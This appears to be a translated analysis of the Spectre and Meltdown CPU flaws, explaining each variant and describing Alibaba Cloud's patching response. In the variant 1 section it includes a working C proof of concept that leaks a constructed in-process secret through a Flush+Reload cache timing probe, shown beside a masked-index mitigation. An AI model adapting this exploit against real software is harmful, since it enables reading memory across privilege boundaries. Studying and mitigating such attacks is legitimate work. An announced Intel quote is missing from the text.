Two days ago, a serious side-channel vulnerability in Intel processors was disclosed that can leak information across privilege boundaries.
The story kept developing. The next day Intel issued a statement on the CPU security vulnerabilities, saying it was working with AMD, ARM and software vendors to resolve the problem, while also noting that other companies' chips have the same issue. Technology giants such as Google, Microsoft and Amazon responded to the event as well.
In the statement, Intel said:
So how big is the impact of this vulnerability? Alibaba Cloud (Aliyun) technical experts have analysed it.
1. Background: what the processor has to do with it
There are two named attacks, Spectre and Meltdown. Spectre has two attack variants and Meltdown has one:
Variant 1: bounds check bypass (CVE-2017-5753)
Variant 2: branch target injection (CVE-2017-5715)
Variant 3: rogue data cache load (CVE-2017-5754)
Before the formal discussion, some background on the processor.
Modern processors increase throughput by working on different instructions at the same time in each stage of the pipeline. To keep that pipeline busy, they add branch prediction and out-of-order (speculative) execution.
Branch prediction guesses the target of a conditional or indirect branch and begins executing code at that target before the branch is actually resolved. If the guess turns out wrong, the pipeline discards the wrongly executed instructions and rolls back the architectural state.
Out-of-order execution lets the processor execute instructions in an order different from program order, so that independent instructions run in parallel instead of waiting on each other.
These optimizations are a major part of modern processor performance. But security researchers recently found that they can create security risks that attackers can exploit in specific situations. The root cause is that the rollback of discarded speculative work is incomplete (microarchitectural state such as cache contents is not restored) and that permission checks are not enforced while instructions execute out of order. It is a clear case of the tension between security design and performance design.
Side-channel attacks on Intel processors are not a new topic; security researchers have done a great deal of work in this area and published many results. What is different this time is that the problem is easier to exploit, the attacks work in practice, and the impact is therefore far greater.
A side-channel attack recovers sensitive information indirectly by observing the use of a shared resource.
The cache in a modern processor is a key design for reducing the average time the processor needs to access memory; with caching, the processor saves a great deal of memory access time when operating on data. But the performance characteristics of the cache are also what security researchers use to mount side-channel attacks: by measuring how long a data access takes, they can tell whether that data is in the cache, and from that leak sensitive information.
Beyond the cache, other shared processor units, such as the branch target buffer, can also be used for side-channel attacks.
2. What is the actual impact of the vulnerabilities?
Spectre vulnerability CVE-2017-5753 (variant 1, bounds check bypass)
This vulnerability is exploited by low-privileged code that drives the execution of higher-privileged code.
For performance, a modern processor predicts branches in advance, and instructions executed early down a mispredicted path are never architecturally committed. But, also for performance reasons, when the pipeline discards that work it does not fully repair everything the speculative execution touched, so traces are left in the cache. Low-privileged malicious software can therefore train the branch predictor so that high-privileged code speculatively touches data it should not, and then read the traces left in the cache to infer that high-privileged data.
This vulnerability needs a specific code pattern to trigger, so to exploit CVE-2017-5753 the attacker must find code of that pattern in the high-privileged code, such as the operating system kernel or the virtualization layer.
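The following C program is an added example, not code from the original article or from Alibaba Cloud. It ties together two passages: the cache-timing side channel described in section 1 (a Flush+Reload probe built on clflush and rdtscp) and the variant 1 pattern just described, with the vulnerable bounds-checked gadget placed next to a hardened version that uses a Linux-kernel-style branchless index mask so that even a mispredicted path cannot read out of range. It assumes an x86-64 CPU compiled with gcc or clang (on other ISAs the probe is compiled out and only the mask logic runs), that a cache hit takes under the assumed 80-cycle threshold, and the names victim_function, victim_function_safe, leak_byte and the CONSTRUCTED_SECRET string are all constructed for the demo. Whether bytes actually leak on a given machine depends on the CPU, compiler optimisation level and the mitigations in effect.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#if defined(__x86_64__)
#include <x86intrin.h>   /* _mm_clflush, __rdtscp */
#define HAVE_X86 1
#else
#define HAVE_X86 0       /* other ISAs: the cache probe is compiled out, the mask code still runs */
#endif

#define PROBE_STRIDE 512        /* one probe slot per byte value, each on its own cache line */
#define CACHE_HIT_THRESHOLD 80  /* cycles; an assumed value, calibrate on the target machine */

unsigned int array1_size = 16;
uint8_t unused1[64];            /* keep array1_size and array1 on different cache lines */
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t probe[256 * PROBE_STRIDE];
const char *secret = "CONSTRUCTED_SECRET";  /* constructed target; never in-bounds for array1 */
uint8_t temp = 0;               /* sink so the compiler keeps the dependent load */

/* Vulnerable gadget (variant 1): the CPU may speculate past the bounds check, load
   array1[x] for an out-of-range x, then touch a probe line that depends on that byte. */
void victim_function(size_t x) {
    if (x < array1_size)
        temp &= probe[array1[x] * PROBE_STRIDE];
}

/* Linux-kernel-style branchless mask: all ones when index < size, 0 otherwise.
   Relies on arithmetic right shift of a negative long (gcc/clang behaviour). */
size_t array_index_mask_nospec(size_t index, size_t size) {
    return (size_t)(~(long)(index | (size - 1UL - index)) >> (sizeof(long) * 8 - 1));
}

/* Hardened gadget: even on a mispredicted path the load stays inside array1[0..size-1]. */
void victim_function_safe(size_t x) {
    if (x < array1_size) {
        x &= array_index_mask_nospec(x, array1_size);
        temp &= probe[array1[x] * PROBE_STRIDE];
    }
}

/* Flush+Reload primitives: evict a line, later time a reload to learn whether it was touched. */
static void flush_line(const void *p) {
#if HAVE_X86
    _mm_clflush(p);
#else
    (void)p;
#endif
}
static uint64_t time_access(const volatile uint8_t *p) {
#if HAVE_X86
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
#else
    (void)p;
    return UINT64_MAX;          /* every probe counts as a miss */
#endif
}
/* Picks the byte value whose probe line was hit most often across all trials. */
int best_guess(const int counts[256], int *hits) {
    int best = 0;
    for (int i = 1; i < 256; i++)
        if (counts[i] > counts[best]) best = i;
    *hits = counts[best];
    return best;
}

/* Leaks array1[malicious_x] through the cache; returns the guessed byte value. */
int leak_byte(size_t malicious_x, int *hits) {
    int counts[256] = {0};
    for (int t = 0; t < 100; t++) {
        for (int i = 0; i < 256; i++) flush_line(&probe[i * PROBE_STRIDE]);
        size_t training_x = t % array1_size;
        for (int j = 29; j >= 0; j--) {
            flush_line(&array1_size);                  /* slow bounds check: longer speculation window */
            for (volatile int z = 0; z < 100; z++) {}  /* let the flush complete */
            /* Branchless select: malicious_x on every 6th call, training_x otherwise,
               so the attacker's own control flow does not retrain the predictor. */
            size_t x = ((j % 6) - 1) & ~0xFFFF;
            x = x | (x >> 16);
            x = training_x ^ (x & (malicious_x ^ training_x));
            victim_function(x);
        }
        for (int i = 0; i < 256; i++) {
            int mix_i = ((i * 167) + 13) & 255;        /* scrambled order defeats the prefetcher */
            if (time_access(&probe[mix_i * PROBE_STRIDE]) <= CACHE_HIT_THRESHOLD
                && mix_i != array1[training_x])
                counts[mix_i]++;
        }
    }
    return best_guess(counts, hits);
}
int main(void) {
    size_t off = (size_t)((uintptr_t)secret - (uintptr_t)array1);  /* array1[off] aliases secret[0] */
    for (size_t i = 0; i < strlen(secret); i++) {
        int hits, b = leak_byte(off + i, &hits);
        printf("array1[%zu]: guess 0x%02x '%c' (%d hits)\n", off + i, b, (b >= 32 && b < 127) ? b : '?', hits);
    }
    return 0;
}
```

The leak loop never calls victim_function_safe; swapping it in for victim_function is the quickest way to see the mitigation at work, since the masked index turns every out-of-range speculative load into a read of array1[0] and the histogram collapses to that value. The mask is preferred over a serializing lfence after the check where the code is hot, because it costs a few ALU operations rather than draining the pipeline.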
Spectre vulnerability CVE-2017-5715 (variant 2, branch target injection)
For CVE-2017-5753 an attacker needs an existing code pattern to mount the attack. If no ready-made pattern is available, the attacker has to consider how to make the victim execute such an exploitable pattern. CVE-2017-5715 is exactly that idea.
The target here is the branch target buffer, an internal data structure that speeds up branch jumps inside the processor and has its own target prediction algorithm. By manipulating that algorithm, an attacker can pre-fill it with malicious jump addresses, so that when the pipeline reaches an indirect branch the processor speculatively executes the attacker-chosen target code before it has resolved the correct address. As before, these executions are eventually abandoned once the pipeline validates the branch, but their effect on the cache remains.
Google's published attack details target KVM, but this attack depends heavily on the processor's architecture and its internal indirect branch prediction algorithm. Of the three it is the hardest to exploit, requiring certain prerequisites and a lot of processor-internal information.
Meltdown vulnerability CVE-2017-5754 (variant 3, rogue data cache load)
Of the three vulnerabilities, Meltdown is the easiest to exploit and has the widest impact.
The essence of this vulnerability is that the processor does not enforce the privilege check on data accesses while executing out of order. For example, when a user-mode program accesses kernel data, a page fault will eventually be raised, but while the instructions are in flight the fault is not yet delivered: the instructions that follow the illegal load execute transiently before the processor actually raises the exception, and their effect on the cache persists, so the loaded kernel byte can be recovered with a cache side channel.
Because the flaw affects most Intel CPU models of the past ten years, it has triggered an unprecedented technology crisis. To be safe, servers, personal computers and mobile phones on the market all need to be updated. But it should also be noted that exploiting this vulnerability has a threshold, and the CPU microcode and operating system updates carry a performance cost, so different users can assess their own situation before deciding.
It is worth mentioning that throughout this process, cloud vendors without exception were among the fastest to respond. On one hand they are responsible for the security of the customers on their platforms; on the other, these platforms have gathered a large number of professional security engineers. So it is foreseeable that cloud platforms will be the first group in the industry to fix the problem.
It is reported that Alibaba Cloud received the key security information from Intel at the end of last year and, based on years of deep work in the kernel area, the two sides have been jointly verifying the remediation plan. As of this article, Alibaba Cloud has not been determined to be affected, and there is no indication that any existing customer has been attacked.
Given that the impact of this event is very wide and also carries a potential performance cost, the team has started the remediation work and is carefully deploying a hot-upgrade (live patching) plan that under normal circumstances does not affect customer business. Some scenarios are known not to support the hot-upgrade scheme; we will notify the customers concerned separately.